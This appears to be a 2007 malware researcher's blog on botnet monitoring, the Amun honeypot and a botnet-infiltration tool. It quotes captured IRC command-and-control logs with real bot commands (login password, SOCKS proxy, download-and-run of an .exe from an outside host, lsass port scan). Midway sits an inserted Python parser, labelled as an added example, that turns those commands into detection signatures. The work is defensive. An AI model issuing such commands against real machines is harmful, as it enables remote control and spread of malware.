Virus Blog

Botnet on the move

— Posted by zeroq @ 17:25 - 20 Dec, 2007

Today I was able to monitor a botnet switching servers, a pretty interesting thing. Monitoring was accomplished with the new infiltrator software, which is not released yet =)

Enjoy the last commands on the old server and channel:

:MasterMir@221.x JOIN :#r0d#
:MasterMir@221.x PRIVMSG #r0d# :.l m4st3r.p3rd3s1
:P-526356@153.x PRIVMSG #r0d# :-4main- Password accepted.
:MasterMir@221.x PRIVMSG #r0d# :.socks4
:P-526356@153.x PRIVMSG #r0d# :-4socks4- Server started on: 81.x.x.x:2020.
:MasterMir@221.x PRIVMSG #r0d# :.upkcr http://x.x.x.x/farooqss/bilals.exe 1
:P-526356@153.x PRIVMSG #r0d# :-4update- Downloading update from: http://x.x.x.x/farooqss/bilals.exe.
:P-526356@153.x PRIVMSG #r0d# :-4download- downloaded 161.0KB to C:\DOCUME~1\Adina\LOCALS~1\Temp\urvzuvd.exe @ 32.2KB/sec, updating bot
:MasterMir@221.x PRIVMSG #r0d# :.rmzcv
:P-526356@153.x PRIVMSG #r0d# :-4main- Removing Bot.
:P-526356@153.x QUIT :EOF From client

If you download the last binary and run it in a sandbox you get the new server IP and IRC information:
  • C&C Server: 217.x.x.x:6667
  • Server Password:
  • Username: rfmv
  • Nickname: DHEDHI-8788
  • Channel: #a#s#b (Password: picture)
  • Channel topic: :zasc lsass_445 100 5 0 189.0.x.x -r -b

So let's take a look at the channel:
:DHEDHI-8788@x.x.x.x JOIN :#a#s#b
:DHEDHI-8788 #a#s#b :zasc lsass_445 100 5 0 189.0.x.x -r -b
:DHEDHI-8788 #a#s#b MasterMir 1198165457
:DHEDHI-8788 @ #a#s#b :DHEDHI-8788 SS-71041 DHEDHI-8992 DHEDHI-0502 DHEDHI-9557 DHEDHI-2349 @MasterMir DHEDHI-1473 DHEDHI-5034
: DHEDHI-8788 #a#s#b :End of /NAMES list.
:DHEDHI-4301@x.x.x.x JOIN :#a#s#b
:DHEDHI-4301@x.x.x.x PRIVMSG #a#s#b :scan Random Port Scan started on 189.0.x.x:445 with a delay of 5 seconds for 0 minutes using 100 threads.
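As an added example (not part of the original post or of the infiltrator tool), here is a small Python parser that turns IRC C&C lines of the shape quoted above into alerts: it splits each line into nick@host, command, channel and trailing text, then matches the text against signatures for the control traffic seen in this post (operator login, download-and-execute URL, SOCKS proxy start, scan start, bot removal). The sample log and its addresses are constructed; the signature names are my own.

```python
import re
from dataclasses import dataclass

# Constructed sample modelled on the IRC C&C traffic quoted in the post; hosts are
# RFC 5737 documentation addresses, not the (masked) originals.
SAMPLE_LOG = """\
:MasterMir@203.0.113.5 PRIVMSG #r0d# :.l m4st3r.p3rd3s1
:P-526356@198.51.100.7 PRIVMSG #r0d# :-4socks4- Server started on: 198.51.100.7:2020.
:MasterMir@203.0.113.5 PRIVMSG #r0d# :.upkcr http://192.0.2.10/farooqss/bilals.exe 1
:P-526356@198.51.100.7 PRIVMSG #r0d# :-4update- Downloading update from: http://192.0.2.10/farooqss/bilals.exe.
:P-526356@198.51.100.7 PRIVMSG #r0d# :-4main- Removing Bot.
:P-526356@198.51.100.7 QUIT :EOF From client
:DHEDHI-4301@198.51.100.9 PRIVMSG #a#s#b :scan Random Port Scan started on 189.0.0.0:445 with a delay of 5 seconds for 0 minutes using 100 threads.
"""
# Every line in the post has the shape  :nick@host COMMAND [target] [:trailing]
IRC_LINE = re.compile(
    r"^:(?P<nick>[^@\s]+)(?:@(?P<host>\S+))?\s+(?P<cmd>[A-Z]+)"
    r"\s*(?P<target>[^:\s]*)\s*(?::(?P<text>.*))?$"
)
IP_PORT = r"(\d{1,3}(?:\.\d{1,3}){3}:\d+)"
# (kind, regex) pairs; group 1, where present, is the indicator worth recording
SIGNATURES = [
    ("operator_login", re.compile(r"^\.l\s+\S+")),               # dot-command + password
    ("download_exec", re.compile(r"^\.\w+\s+(https?://\S+)")),   # dot-command + URL
    ("update_fetch", re.compile(r"Downloading update from: (\S+?)\.?$")),
    ("proxy_started", re.compile(r"Server started on: " + IP_PORT)),
    ("scan_started", re.compile(r"Scan started on " + IP_PORT)),
    ("bot_removed", re.compile(r"Removing Bot")),
]

@dataclass
class Alert:
    kind: str
    nick: str      # who said it: controller (dot-commands) or a bot (-4...- replies)
    host: str
    channel: str
    ioc: str       # URL or ip:port pulled from the message, "" if none

def analyze(log: str) -> list[Alert]:
    # Parse raw IRC lines and emit one Alert per matched C&C signature
    alerts = []
    for raw in log.splitlines():
        m = IRC_LINE.match(raw)
        if not m or m["cmd"] != "PRIVMSG":
            continue  # JOIN/QUIT/NAMES lines carry no commands
        for kind, sig in SIGNATURES:
            hit = sig.search(m["text"] or "")
            if hit:
                ioc = hit.group(1) if hit.groups() else ""
                alerts.append(Alert(kind, m["nick"], m["host"] or "", m["target"], ioc))
    return alerts
```

Running `analyze(SAMPLE_LOG)` yields one alert per control event in order, which is enough to drive a channel timeline or feed the URLs and ip:port pairs into a blocklist.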


Encrypted HTTP Bot

— Posted by zeroq @ 10:29 - 20 Dec, 2007

I stumbled over an HTTP-based bot which uses encryption for its commands and URL parameters. I have not seen this before, so I decided to let you all know about it.

Another interesting thing: the binary does not run in the Anubis sandbox, but it does in CWSandbox.

Infected machines issue an HTTP request similar to this: http://64.34.xxx.xxx/tba/p?guid=xxx&version=xxx[...]

The following parameters are used:

  • guid
  • version
  • clientid
  • time
  • locale
  • idle
  • activeWindows
  • crc

The values look like this:

  • E723E7BF51[...]DA96
  • F01[...]B1
  • AB0E[...]0F7



Amun first release v0.1.0

— Posted by zeroq @ 11:39 - 11 Dec, 2007

I decided to release a first version of Amun to the public. Amun is released under the GNU Public Licence. The software is available here: http://zero.ram.rwth-aachen.de/amun/

Amun is a low-interaction honeypot designed to capture autonomously spreading malware, like nepenthes for example. The main difference is that it is written in Python and most parameters can be changed at runtime, so it might be easier to add new features.



Amun: replace locals

— Posted by zeroq @ 15:00 - 09 Dec, 2007

The replace-local-IPs function is now fully implemented in Amun. I had some minor issues which needed to be fixed, but it's working now. Currently we are running two Amun sensors with about 7000 IP addresses each. One of the sensors is running with replace local IPs turned on, the other one with it turned off.

Now the interesting thing is that the sensor which does not replace local IPs, and therefore has fewer downloads overall, nevertheless has many more unique downloads. So replacing local IPs to get more downloads does not actually mean you get all the new samples.

Some Numbers:
Amun (replace locals on): average (overall) downloads per day: 70
Amun (replace locals off): average (overall) downloads per day: 10
Both sensors have been running with these settings for 5 days now, and sensor number two (with replace locals turned off) currently has 16 more unique samples, that's about 3 more unique samples per day.



Infiltrator Fast Introduction

— Posted by zeroq @ 10:43 - 04 Dec, 2007

For those of you playing around with the infiltrator script, here is some short documentation on how to get started:

  • use the "set server" command to set the IP address of the command and control server (e.g. "123.456.789.0")
  • use the "set port" command to set the IRC Server port (e.g. "80")
  • use the "set nickname" command to set the bot nickname (e.g. "DEU|123456789")
  • use the "set usermode" command to set the user mode (e.g. "a a a a:DEU|123456789"). If you do not set the usermode, infiltrator will automatically set it to "worm worm worm worm:[Nickname]".
  • use the "set channel" command to set the botnet channel + channel password (e.g. "#botnet password")
  • in some cases you need a server password as well, and that's where the command "set password" comes into play.

Now you are done setting up the configuration. Next, issue "start thread" and infiltrator will join and monitor the botnet. To save the current configuration use the command "save configuration".
